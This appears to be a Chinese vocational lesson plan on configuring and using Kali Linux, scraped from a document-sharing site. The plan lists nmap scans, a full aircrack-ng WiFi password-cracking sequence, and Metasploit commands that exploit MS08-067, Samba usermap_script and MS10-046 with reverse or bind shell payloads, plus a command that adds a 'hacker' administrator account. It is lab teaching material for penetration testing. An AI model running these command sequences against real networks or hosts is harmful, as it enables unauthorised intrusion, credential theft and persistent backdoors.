《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第1頁(yè)
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第2頁(yè)
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第3頁(yè)
《linux服務(wù)器配置與管理》教案15-任務(wù)十五 KALI操作系統(tǒng)的配置和使用_第4頁(yè)
全文預(yù)覽已結(jié)束

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

教案授課章節(jié)任務(wù)十五:KALI操作系統(tǒng)的配置和使用(4課時(shí))教學(xué)目標(biāo)1.KALI服務(wù)器的安全工具使用2.掌握KALI服務(wù)器的安全工具使用教學(xué)內(nèi)容1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP、windows20034.使用安全漏洞檢測(cè)工具攻擊LINUX、windows7重點(diǎn)難點(diǎn)1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP攻擊windows20034.使用安全漏洞檢測(cè)工具攻擊LINUX靶機(jī)攻擊windows7教學(xué)方法1.采用“項(xiàng)目引導(dǎo)”、“任務(wù)驅(qū)動(dòng)”教學(xué)方法,并以實(shí)踐操作演示進(jìn)行講解。2.在課堂上注意講、學(xué)、做相結(jié)合,注重“問(wèn)題引導(dǎo)”學(xué)生互動(dòng),充分調(diào)動(dòng)學(xué)生的積極性,培養(yǎng)學(xué)習(xí)興趣、分析問(wèn)題和解決問(wèn)題的能力以及自學(xué)能力。課前準(zhǔn)備教學(xué)環(huán)境準(zhǔn)備:1.“教、學(xué)、做”一體化學(xué)生機(jī)房,教師機(jī)需要連接投影儀或者安裝同屏教學(xué)軟件;2.學(xué)生一人一機(jī)、可將學(xué)生每4-6人分為一組;3.機(jī)房電腦操作系統(tǒng)安裝好VMWareWorkstation14.0、需要CentOS7.4鏡像。學(xué)生預(yù)習(xí)要求:1.閱讀紙質(zhì)教材,查閱與本章節(jié)相關(guān)資料;2.在教學(xué)平臺(tái)上學(xué)習(xí)教材電子版和課件。教學(xué)過(guò)程師生活動(dòng):一、復(fù)習(xí)提問(wèn)1.如何檢查服務(wù)器的系統(tǒng)基本信息2.如何文件及目錄權(quán)限、進(jìn)程管理二、導(dǎo)入新課1.無(wú)線網(wǎng)絡(luò)檢測(cè):無(wú)線網(wǎng)絡(luò)不需要受到網(wǎng)線接入的位置限制,操作起來(lái)方便快捷,但是其所存在的安全問(wèn)題也日益突出,已經(jīng)威脅到無(wú)線網(wǎng)絡(luò)的正常運(yùn)行。存在的主要安全問(wèn)題有:無(wú)線網(wǎng)絡(luò)盜用、竊聽(tīng)網(wǎng)絡(luò)通信、釣魚(yú)攻擊無(wú)線網(wǎng)絡(luò)、控制用戶的無(wú)線AP等。無(wú)線網(wǎng)絡(luò)安全問(wèn)題的應(yīng)對(duì)措施有:限制無(wú)線網(wǎng)絡(luò)的接入、隱藏SSID、選擇合適的安全標(biāo)準(zhǔn)、修改無(wú)線路由器的密碼、降低無(wú)線AP的功率等。2.滲透測(cè)試軟件檢測(cè)操作系統(tǒng)安全三、講授新課1.任務(wù)描述:某單位在網(wǎng)絡(luò)安全檢查中,需要使用KALI操作系統(tǒng),用于網(wǎng)絡(luò)安全檢測(cè)及調(diào)查取證。系統(tǒng)管理員在使用KALI過(guò)程中,需要使用安全漏洞檢測(cè)工具以及無(wú)線安全工具檢驗(yàn)密碼強(qiáng)度及系統(tǒng)的強(qiáng)壯性。2.決策指導(dǎo):KaliLinux預(yù)裝了許多滲透測(cè)試軟件,包括nmap、Wireshark、JohntheRipper,以及Aircrack-ng等。用戶可通過(guò)硬盤、liveCD或liveUSB方式來(lái)運(yùn)行。它既有32位和64位的鏡像,用于x86指令集。又有基于ARM架構(gòu)、樹(shù)莓派和三星的ARMChromebook的鏡像。集成超過(guò)300個(gè)滲透測(cè)試軟件,給用戶提供了大量的安全工具。3.安裝配置命令知識(shí)要點(diǎn)1.學(xué)習(xí)NMAP安全工具nmap-sS-p1-65535-vnmap-p80--script=http-enum.nse2.學(xué)習(xí)aircrack安全工具破解wifi密碼airmon-ngstartwlan0airodump-ngwlan0monairodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0monaireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0monairmon-ngstopwlan0monaircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP、windows2003Msfconfsolenmap--script=smb-check-vulns--script-args=unsafe=1useexploit/windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpshowoptionssetRHOST6setLHOST37exploitnetuserhacker123456/addnetlocalgroupadministratorhacker/add4.使用安全漏洞檢測(cè)工具攻擊LINUX、windows7searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploituseexploit/windows/browser/ms10_046_shortcut_icon_dllloader4.任務(wù)實(shí)施過(guò)程一:學(xué)習(xí)NMAP安全工具5.任務(wù)實(shí)施過(guò)程二:學(xué)習(xí)aircrack安全工具破解wifi密碼6.任務(wù)實(shí)施過(guò)程三:學(xué)習(xí)安全漏洞檢測(cè)工具、攻擊windowsXP攻擊windows20037.任務(wù)實(shí)施過(guò)程四:使用安全漏洞檢測(cè)工具、攻擊LINUX靶機(jī)攻擊windows78.Nmap常用參數(shù)參數(shù)說(shuō)明-sPping掃描,Nmap在掃描端口時(shí),默認(rèn)都會(huì)使用ping掃描-sL簡(jiǎn)單列表掃描-sn使用PING主機(jī)方式-sV監(jiān)測(cè)端口服務(wù)版本操作系統(tǒng)信息主機(jī)名等-sS半開(kāi)掃描-sTTCP方式掃描,會(huì)在目標(biāo)主機(jī)的日志中記錄大批連接請(qǐng)求和錯(cuò)誤信息。-sUUDP掃描,UDP掃描是不可靠的-sA這項(xiàng)高級(jí)的掃描方法通常用來(lái)穿過(guò)防火墻的規(guī)則集-sF-sN秘密FIN數(shù)據(jù)包掃描、XmasTree、Null掃描模式-sC腳本掃描-A全面系統(tǒng)檢測(cè)、啟用腳本檢測(cè)、掃描等-O啟用遠(yuǎn)程操作系統(tǒng)檢測(cè),但可能存在誤報(bào)-V-v-v顯示掃描過(guò)程,推薦使用-PN掃描之前不使用ping命令-p指定端口,如“1-65535、1433、135、22、80、3389”等-h幫助文檔-T4針對(duì)TCP端口禁止動(dòng)態(tài)掃描延遲超過(guò)10ms設(shè)置時(shí)間模板-iL讀取主機(jī)列表,“-iLD:\iplist.txt”-oN-oX-oG將報(bào)告寫入文件,分別是正常、XML、grepable三種格式-traceroute路由跟蹤掃描--script按照腳本分類進(jìn)行掃描-6開(kāi)啟IPv6掃描9.本小節(jié)用到的命令。useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37四、課堂練習(xí)1.開(kāi)啟SSH學(xué)習(xí)crunch密碼工具2.學(xué)習(xí)aircrack安全工具3.使用NMAP工具4.學(xué)習(xí)aircrack安全工具5.破解wifi密碼6.學(xué)習(xí)安全漏洞檢測(cè)工具7.攻擊windowsXP攻擊windows20038.攻擊LINUX靶機(jī)攻擊windows7學(xué)生活動(dòng):觀看教師演示、邊學(xué)邊做、思考、討論、完成任務(wù)實(shí)踐五、課堂小結(jié)1.總結(jié)本課學(xué)習(xí)內(nèi)容2.總結(jié)、評(píng)價(jià)學(xué)生小組活動(dòng)情況二次備課布置作業(yè)1.完成課后鞏固練習(xí)題;2.上交書(shū)面作業(yè)或者在教學(xué)平臺(tái)上完成電子文檔上傳;3.觀看下一任務(wù)的微課或者項(xiàng)目實(shí)錄視頻。板書(shū)設(shè)計(jì)1.學(xué)習(xí)NMAP安全工具2.學(xué)習(xí)aircrack安全工具破解wifi密碼3.學(xué)習(xí)安全漏洞檢測(cè)工具攻擊windowsXP、windows20034.使用安全漏洞檢測(cè)工具攻擊LINUX、windows7教后反思通過(guò)學(xué)生互動(dòng)活動(dòng),有利于學(xué)生自主學(xué)習(xí)與合作交流。一能加深對(duì)識(shí)別法的認(rèn)識(shí),有助對(duì)教學(xué)內(nèi)容的鞏固;二利用這一互動(dòng)活動(dòng),及時(shí)反饋信息,有利于教師調(diào)整教學(xué)策略,優(yōu)化教學(xué)方法,提高教學(xué)質(zhì)量。學(xué)生完成教學(xué)任務(wù)評(píng)價(jià)表評(píng)價(jià)指標(biāo)及評(píng)價(jià)內(nèi)容★★★★★★評(píng)價(jià)方式基本操作20分部署KALI操作系統(tǒng)教師評(píng)價(jià)開(kāi)啟SSH學(xué)習(xí)crunch密碼工具動(dòng)手做20

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論